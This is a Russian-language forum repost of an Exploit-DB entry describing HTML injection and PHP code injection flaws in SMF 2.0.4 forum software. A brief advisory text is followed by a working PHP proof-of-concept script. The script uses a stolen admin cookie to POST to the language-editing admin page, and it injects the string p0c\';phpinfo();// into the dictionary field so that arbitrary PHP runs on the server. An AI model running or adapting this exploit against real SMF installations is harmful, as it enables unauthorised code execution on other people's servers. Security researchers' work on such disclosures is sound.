Exploit SMF - '/index.php' HTML Injection / Multiple PHP Code Injection Vulnerabilities

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
38491
Проверка EDB
  1. Пройдено
Автор
JAKUB GALCZYK
Тип уязвимости
WEBAPPS
Платформа
PHP
CVE
N/A
Дата публикации
2013-04-23
SMF - '/index.php' HTML Injection / Multiple PHP Code Injection Vulnerabilities
PHP:
source: https://www.securityfocus.com/bid/59409/info

SMF is prone to an HTML-injection and multiple PHP code-injection vulnerabilities.

An attacker may leverage these issues to execute arbitrary server-side script code on an affected computer with the privileges of the affected application and inject hostile HTML and script code into vulnerable sections of the application.

SMF 2.0.4 is vulnerable; other versions may also be affected. 

<?php

// proof of concept that latest SMF (2.0.4) can be exploited by php injection.

// payload code must escape from \', so you should try with something like
// that:
// p0c\';phpinfo();// as a 'dictionary' value. Same story for locale
// parameter.
// For character_set - another story, as far as I remember, because here we
// have
// a nice stored xss. ;)

// 21/04/2013 
// http://HauntIT.blogspot.com

// to successfully exploit smf 2.0.4 we need correct admin's cookie:
$cookie = 'SMFCookie956=allCookiesHere';
$ch =
curl_init('http://smf_2.0.4/index.php?action=admin;area=languages;sa=editlang;lid=english');

curl_setopt($ch, CURLOPT_HEADER, 1);
curl_setopt($ch, CURLOPT_COOKIE, $cookie);
curl_setopt($ch, CURLOPT_POST, 1); // send as POST (to 'On')
curl_setopt($ch, CURLOPT_POSTFIELDS,
"character_set=en&locale=helloworld&dictionary=p0c\\';phpinfo();//&spelling=american&ce0361602df1=c6772abdb6d5e3f403bd65e3c3c2a2c0&save_main=Save");
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);

$page = curl_exec($ch);

echo 'PHP code:<br>'.$page;

curl_close($ch); // to close 'logged-in' part

?>
 
Источник
www.exploit-db.com

Похожие темы